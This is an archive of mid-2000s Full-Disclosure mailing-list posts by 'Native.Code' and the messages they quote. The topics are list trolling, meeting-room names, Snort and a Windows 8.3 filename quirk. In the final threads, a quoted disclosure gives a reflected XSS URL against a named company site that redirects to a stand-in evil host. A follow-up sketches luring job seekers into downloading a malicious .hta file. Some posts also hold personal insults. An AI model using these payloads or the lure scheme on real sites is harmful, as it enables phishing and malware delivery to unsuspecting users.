Re: [Full-disclosure] IMLogic telling porkies about Yahoo

2005-10-14 Thread Native.Code 
This n3td3v guy is such a troll and stupid person. Will someone pls block him from FD?
 
For God sake! Why did these kids joined this list?
 
-NC 
On 10/14/05, James Tucker <[EMAIL PROTECTED]> wrote:
Sorry for the extremety of my blunt response, but I have two things to say:1. How the fuck do YOU know any more than they do? Just because you
obsess over the security factors around a company with which you haveno affiliation does not put you in any greater authority to makestatements like those you made there.2. I have absolutely no interest in the topic of Yahoo! as a general
view. Please keep your Yahoo orientated discussions on a Yahoo! loverslist or similar. I will contend statistics I read on my own, anddecide my own level of trust. I certainly am not going to trust arandom person with the name "n3td3v" to provide me more accurate
statistics than a company devoted to the topic, as such, yourstatement of observation (which is completely unjustified in your blogentry, I might add) bears no relevance here. Moreover it can be bestclassed as a political attack, which is actively discouraged by the
list charter.Oh, and just FYI:http://www.technewsworld.com/story/43364.htmlDid you even check up on your own imagination before writing that, or
does it just flow straight out the fingers?-Yet another donation to the WWWaste.On 10/14/05, n3td3v <[EMAIL PROTECTED]> wrote:> 
http://n3td3v.blogspot.com/2005/10/imlogic-telling-porkies-about-yahoo.html> ___> Full-Disclosure - We believe in it.> Charter: 
http://lists.grok.org.uk/full-disclosure-charter.html> Hosted and sponsored by Secunia - http://secunia.com/>___Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] annoying bug in Windows XP

2005-10-16 Thread Native.Code 
I won't say it is bug. It is expected behavior in 8.3 filesystem. Anyone who has used Windows over a year knows this behavior.
On 10/16/05, Poof <[EMAIL PROTECTED]> wrote:
Yes, this occurs since you're just using the 8+3 filesystem with longfilenames. If you'll notice:
File1.jav shows as just that. While File1.java shows as File1~1.jav(It usually hides the non-LFN tree with default dir flags. I don't rememberhow to get it to show it all at this time.)~-Original Message-
From: [EMAIL PROTECTED][mailto:[EMAIL PROTECTED]
] On Behalf Of FrankDietrichSent: Sunday, October 16, 2005 1:25 AMTo: full-disclosure@lists.grok.org.ukSubject: [Full-disclosure] annoying bug in Windows XP
Hi to all readers,this day I found a annoying misbehavior in Windows XP professionalwith SP2.I had a directory with some Java sources (*.java) and some backupfiles (*.jav). Because I din't longer need the backup files I would
delete them with 'del *.jav'. But this command also delete all thesource files. #§%*. The last backup was 4 hours ago. :-/So I tried what happen and the result is the command above checksonly the first three chars from the extension (DOS is alive).
Here is how you can reproduce it:mkdir testbugcd testbugrem.>file1.javrem.>file2.javarem.>file3.javasdel *.javAll three files are deleted. Is this a known bug or a unknown feature?
Frank--21 is only half the truth___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] how to describe this tool ?

2005-11-01 Thread Native.Code 
Depends the use you put it on. I will call it auditing tool.
 
On 11/2/05, news-letters <[EMAIL PROTECTED]> wrote:
Hi list,I have a perl script I'd like to release(GPL), but I don't really knowhow to describe it.
To make it short here's a session on one (remote)machine.(but it'sintended to be run on ip ranges with mostly windows hosts).Starting script.pl ...searching hosts in 
192.168.0.100 ...found 192.168.0.100   : BRAINstarting information gathering on BRAINgetting OS version ...TCP port scanning ...UDP port scanning ...
Getting process list ...Getting services list ...Getting drive list ...Getting share list ...Getting installed applications list ...Creating naudit_report_192.168.0.100.html ... (printable)
Creating report for 192.168.0.100 ... (browsable)done. Completed in 8.004 secondsand attached is a sample (printable)report.Is this an :
enumeration tool ?auditting tool ?Any idea ?Have a nice day.Simon___Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: new IE bug (confirmed on ALL windows)

2005-11-02 Thread Native.Code 
Guys:
 
Being all of you IT genius, is there any way that I can't recieve email from this thread but can from others? I don't want to use a filter or a moderated list.
 
Thanks. 
On 11/2/05, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
Nop here im sure sorry, for example someone reported in this thread to copythis content into an html file:
"http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
">
.supp IMG {
VERTICAL-ALIGN: middle
}
.Crashes on xp, 2k it no more crashes, 98 it crashes 1/5 tries... but the one
I posted , it crashes everytime loaded and everywhere I have mentioned + 98included, and this Im 100% sure. This hole is very unreliable so follow MYinstructions if you do want to test ...-Message d'origine-
De: [EMAIL PROTECTED][mailto:[EMAIL PROTECTED]
] De la part de Dave KornEnvoyé: mercredi 2 novembre 2005 15:18À: full-disclosure@lists.grok.org.ukObjet: [Full-disclosure] Re: new IE bug (confirmed on ALL windows)
> -Message d'origine-> De : full-disclosure-bounces De la part de Greg> Envoyé : mardi 1 novembre 2005 21:32> - Original Message -> From: <
[EMAIL PROTECTED]>> Sent: Wednesday, November 02, 2005 4:00 AM>> I think I have found by chance this weekend a security bug,while>> browsing the website news, within iexplorer on all windows versions.
 Sorry to be the "Negative Nark" here but yes, the crash works on> IESP2 with XPSP2 but NO it does NOT crash WIN98SE with IESP2. The> 98SE box was networked through ICS (wired to this XP box then wi-fi
> to a router) and has no firewall of it's own. This XP box through> which the 98SE box gets it's internet is in the router's DMZ and uses> only Zone Alarm Pro, just for clarity.
[EMAIL PROTECTED] wrote in news:[EMAIL PROTECTED]> Again shut the fuck up , it also crashes on 98SE I have it here IDIOT.[...ker-snip!...]   Guys?  Can I point out the obvious possibility that you both seem to
have overlooked?Rather than arguing about either "it does crash on 98" or "it doesn'tcrash on 98", and since you've *both* _actually_ tested it, AND GOTTENDIFFERENT RESULTS, don't you think that you should both conclude that "It
crashes on some 98 installs and not others", and therefore that thedetermining factor is not the OS version anyway, but something else that'sdifferent between your two setups?It's a false assumption that it has to be all one or the other.
   cheers, DaveK--Can't think of a witty .sigline today___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/___Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Meeting Room Names

2005-11-09 Thread Native.Code 
Something not related to vulnerabilities you guys are requested to suggest names for our meeting rooms. We don't want to call them with sad names like Room A, Board Room etc. but something interesting.

 
We work in IT security area like you. A room with which name will you like to have your meeting in?
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Meeting Room Names

2005-11-09 Thread Native.Code 
Thanks all for cool ideas! I kind of like HTTP status codes and Microsoft product codenames. But still did not get any perfect choices. Please keep the choices coming!

 
How about names which sound in same rank of "Dungeon"? Feel free to use your non-IT creativity as well!
 
Thanks a lot again.
On 11/10/05, KF (lists) <[EMAIL PROTECTED]> wrote:
Or even betterletstalkaboutitofflist1 and takeittoyourprivateinbox2-KFMarlon Jabbur wrote:
>Call it Room 1, Room 10, Room 11, Room 100 and so on :-)>>On Wednesday 09 November 2005 08:08, Native.Code wrote:>>>>We don't want to call them with sad names like>>Room A, Board Room etc. but something interesting.
>>>>>___>Full-Disclosure - We believe in it.>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/>>>>>___Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Meeting Room Names

2005-11-10 Thread Native.Code 
My intention is really to get some cool ideas but seems like some people are not happy about it. Obviously I don't want to offend anyone but I hope that when people subscribe to any mailing list, they should understand that they may not like *everything* being posted to that list.

 
I don't like some stuff posted on this list too but I just delete those conversations instead of complaining.
 
Some of you have really given good ideas. I am ranking those and once we decide on Monday, will send a note of thanks. Till then if anyone of you have another idea, pls send it in :-)

 
Regards,
On 11/10/05, Jeanmougin, Mark <[EMAIL PROTECTED]> wrote:
> -Original Message-> From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]] On Behalf OfNative.Code> Sent: Wednesday, November 09, 2005 23:35> To: 
full-disclosure@lists.grok.org.uk> Subject: Re: [Full-disclosure] Meeting Room Names>> Thanks all for cool ideas! I kind of like HTTP status codes and> Microsoft product codenames. But still did not get any perfect
> choices. Please keep the choices coming!>> How about names which sound in same rank of "Dungeon"? Feel free to> use your non-IT creativity as well!>> Thanks a lot again.
Native.Code,I know that you're getting some heat about having this discussion onlist, but I'm really enjoying it.  So, please continue to copy me on anylist ideas you're hearing.Thanks!
MJThis e-mail transmission contains information that is confidential and may be privileged.   It is intended only for the addressee(s) named above. If you receive this e-mail in error, please do not read, copy or disseminate it in any manner. If you are not the intended recipient, any disclosure, copying, distribution or use of the contents of this information is prohibited. Please reply to the message immediately by informing the sender that the message was misdirected. After replying, please erase it from your computer system. Your assistance in correcting this error is appreciated.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Hackers Tomorrow

2005-11-15 Thread Native.Code 
oh n3td3v!! I finally learned to spell your name. Am I in love with you?
On 11/15/05, Native.Code <[EMAIL PROTECTED]> wrote:
oh n3td3v!! I finally learned to spell your name. Am I in love with you?
On 11/15/05, n3td3v v3dt3n <[EMAIL PROTECTED]
> wrote: 

Hello kind fellow disclosers,   Since my last article gained so much praise i have written a second part on "hackers tomorrow".  I have also heeded the criticism and have aquired my own domain so i look more cooler  :)  
n3td3v.com of course. I have a new 1337 super secure mail addy 
[EMAIL PROTECTED] also. I love feedback :)   My article is at  my new home http://www.n3td3v.com/hackerstomorrow.html 
     Enjoy!!   n3td3v ___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - 
http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Window's O/S

2005-11-24 Thread Native.Code 
Weird! haha :-) )
On 11/24/05, Stelian Ene <[EMAIL PROTECTED]> wrote:
jacob jango wrote:> create an folder on deskop and name it as "notepad".> open internet explorer > go to view > source code > this will open the
> contents of notepad folder!!Even better: rename any exe to notepad.exe ;)___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Snort as IDS/IPS in mission-critical enterprise network

2005-12-08 Thread Native.Code 
Hi security peers,
 
We are thinking to use Snort as IDS/IPS solution in our network where only port 80 and 443 are open to public internet. I would like to know how will you guys rate Snort compared to ISS RealSecure Network (
http://www.iss.net/products_services/enterprise_protection/rsnetwork/sensor.php)? Is Snort enterprise ready where it can be deployed to monitor mission-critical network?

 
If any of you can name any big network which is using Snort as an example, it will be very helpful.
 
Thanks,
Native.Code
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Snort as IDS/IPS in mission-critical enterprise network

2005-12-11 Thread Native.Code 
Dear all,
 
Thanks for valuable input. It was very much appreciated. I kind of get the impression that Snort is very stable product but it needs a lot of effort configuring, monitoring and customizing. We will definitely give it a try. I assume I did not mention, we will be using Windows binary. Is this as stable as Linux version?

 
Some of you mentioned that many commercial productions are based on Snort. Can anyone name another product besides those from Sourcefire?

 
Thanks again,
Native.Code
On 12/10/05, Technica Forensis <[EMAIL PROTECTED]> wrote:
> what ever happened to FPGA/hardware based NIDS classifiers?  There> seemed to be a number of papers and even some open source (open cores)
> code to do 10GigE with ease.>> still in the research labs?http://www.cloudshield.comand have your pocketbook ready, 'cause it ain't cheap.___
Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - 
http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] N3td3v poll

2005-12-21 Thread Native.Code 
Maybe n3td3v should change the ID and start anew? With a more mature approach to security?
 
I would do that if I was that much humiliated. Life is about learning lessons from your mistakes and not to make those again.
To start with, rename your Geocities homepage to something more realistic than "GLOBAL INTERNET OPERATIONS"  
On 12/21/05, fok yo <[EMAIL PROTECTED]> wrote:

The skies are falling:
Famous security woe N3td3v found yet another critical internet vulnerability, this time in snappoll...
He managed voting 36 times (once for each alter-ego ?).Is snappoll as flawed as diebold?
 
2005/12/21, GroundZero Security <[EMAIL PROTECTED]>: 
where is your brain oh senseless one
 
In case you did not notice, n3td3v is a very sensitive lad. Pretty skilled too: he managed parsing 1000s of lines of html to discover evil xss in 
google.com. Patching the bug required changing the google groups design so fundamentally it took google engineers over a week to implement a stable patch. 
Let's kneel and praise netdev for 53cur1n D4 Pl4n3t, no need to be jealous, he's simply the best, yeah!

We are the spammers, sending unsollicited mail, w3tf4rt's our king.
 
- Original Message -From: "n3td3v" <
[EMAIL PROTECTED] >To: Sent: Wednesday, December 21, 2005 12:45 AM
Subject: Re: [Full-disclosure] N3td3v poll> Wheres your Google and Yahoo vulnerabilities "fdlister"? I await your > reply, oh jealous one. ;-)
 
You're way too deep man
> 
http://n3td3v.blogspot.com> http://geocities.com/n3td3v> 
http://groups.google.com/group/n3td3v
bah, my sarcasm is sickening me somehow.
 
--
 
Stop internet pollution, bully n3td3v and the like!
 ___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] N3td3v poll

2005-12-21 Thread Native.Code 
Another n3td3v quote: "I really think if I or my people were"
On 12/21/05, n3td3v <[EMAIL PROTECTED]> wrote:
I really think if I or my people were to take the opportunity to studythe code, there would a lot than 36 votes sitting on that file. No one
has the spare resources to even care about hacking such a meaningless,child-like poll. Time to get back to what counts, and thats researchinto Google and Yahoo. I think if there was a case of vote rigging,
however, it would be carried out by my opponents, who are more thanwilling to carry this anti-n3td3v propaganda way into 2006, to ruin myreputation, and to pollute the list with polls and quotes, seenalready in this and past anti-n3td3v threads. Have a good new year,
i'm sure you'll have no vulnerabilities to disclose, since you'resomeone who just hates on people who do disclose vulnerabilities tovendors and the security community.On 12/21/05, fok yo <
[EMAIL PROTECTED]> wrote:> The skies are falling:> Famous security woe N3td3v found yet another critical internet> vulnerability, this time in snappoll...> He managed voting 36 times (once for each alter-ego ?).
> Is snappoll as flawed as diebold?___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] N3td3v poll

2005-12-21 Thread Native.Code 
From http://www.geocities.com/n3td3v/home/hire.html?200521
 
Some nice quotes here, and the real reason behind n3td3v's childhood (it's quick-dollars baby!)
 









Get n3td3v working for you Written by n3td3v, November 2005Are you hiring? I can offer the following, and more. 
ResearchUpdates on IM and e-mail threats towards employees at your business KnowledgeThreats posed by hackers with interests in your business SecurityOriginal ideas for protecting data information on your business 
DevelopmentSecure solutions for software on your business PreventionPrevention of known planned attacks on your business AlertsGet regular updates on the threat level on your business 
You know what to do, so do it...Hire someone with real knowledge on your business and bring back that peace of mind you don't have right now. More
Learn More about n3td3v.Return to the Homepage. 
 
 
 
 
On 12/21/05, n3td3v <[EMAIL PROTECTED]> wrote:
I really think if I or my people were to take the opportunity to studythe code, there would a lot than 36 votes sitting on that file. No one
has the spare resources to even care about hacking such a meaningless,child-like poll. Time to get back to what counts, and thats researchinto Google and Yahoo. I think if there was a case of vote rigging,
however, it would be carried out by my opponents, who are more thanwilling to carry this anti-n3td3v propaganda way into 2006, to ruin myreputation, and to pollute the list with polls and quotes, seenalready in this and past anti-n3td3v threads. Have a good new year,
i'm sure you'll have no vulnerabilities to disclose, since you'resomeone who just hates on people who do disclose vulnerabilities tovendors and the security community.On 12/21/05, fok yo <
[EMAIL PROTECTED]> wrote:> The skies are falling:> Famous security woe N3td3v found yet another critical internet> vulnerability, this time in snappoll...> He managed voting 36 times (once for each alter-ego ?).
> Is snappoll as flawed as diebold?___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MBT Xss vulnerability

2006-01-19 Thread Native.Code 
What a lame vulnerability it is. If your POC redirects to another site (which is not MBT site), how someone will become victim and believe that he/she is doing business with MBT?
 
Your post is yet another proof that FD is more and more inhibited by scipt kiddies. Get a life!
On 1/19/06, MuNNa <[EMAIL PROTECTED]> wrote:
Hii List;Recently, i found an Xss vulnerabilty in MBT web site. MBT offers services from Consulting to Managed 
Services.It is the Corporate member of The International Systems Security Engineering Association (ISSEA). BS 7799 (Information Security Management Framework) certified organizationVulnerability: MBT  XSS (Cross Site Scripting) Attacks
Criticality: MediumDescription:MBT (
http://www.mahindrabt.com/website/index.htm ) is a leading India-based global IT solutions provider. As a proven leader in application outsourcing and offshoring of business critical applications, MBT enables its clients, protect their investment in legacy systems, enhance capital budgets, reduce operating expenses and build solutions for the multi-services future. However it suffers Xss vulnerability on its own web page. 
Below is the proof-of-concept which explains this - 
http://www.mahindrabt.com/jse/jsp/search.jsp?q=[Xss malcode here]Re-directing the site to any malicious or fake site to trap the victim :
http://www.mahindrabt.com/jse/jsp/search.jsp?q= 
document.location='http://www.[evil.site].com' Though it does not affect sever side alot and may seem harmless, but it can be used to target college students or job-seekers as it is one of the most attracting employer. Targets can be lured to visit the malicious weblink under the pretext of some job positions being vacant.

Vendor notification: 
Vendor has been notified twice, around 4 months ago but still there is no response and I guess neither they are going to respond. Regards;Santosh J.___
Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MBT Xss vulnerability

2006-01-22 Thread Native.Code 
Nice discussion guys. Perhaps I should have mentioned that XSS about every site should not be posted to FD. And MBT does *not* attract millions of job-seekers. It is an Indian employer and IT job-seekers in India, at any given time, should not be more than one million.

 
I believe most of subscribers on this list did not have to know this XSS. It should have been better reported to IT team at MBT.
 
Best. 
On 1/21/06, MuNNa <[EMAIL PROTECTED]> wrote:
Hii Bro,I got the point.You meant to say that Xss for each and every site should not be posted here, unless n until it attracts heavy traffic like Yahoo etc. I agree to this that MBT doesnt attract that amount of traffic normally  but you can target millions of users at one go.
Like say...there are many groups that post new job vacancies everyday. So if i create a url with _javascript_ allowing you to download a file with say .hta  extension and  it claims itself to be some form that has to be filled by victim in order to apply for job. 
For eg. http://www.mahindrabt.com/jse/jsp/search.jsp?q=document.location='www.evil.com/applicationform.hta'
If you post this URL in any of the above groups, you can be sure that your file will be downloaded  by thousands of users. This is because MBT is one of the top employers. Believe me.Before some one downloads such files and gets his machine compromised, i just wanted to warn the users. As number of victims could be large enough to create havoc, MBT's Xss vuln was of great concern to 
me.This is what made me post this vuln over here. May be i might have posted it in the wrong list. If this is the case, i am sory to cause annoyance to you and others.Regards;Santosh J.___
Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/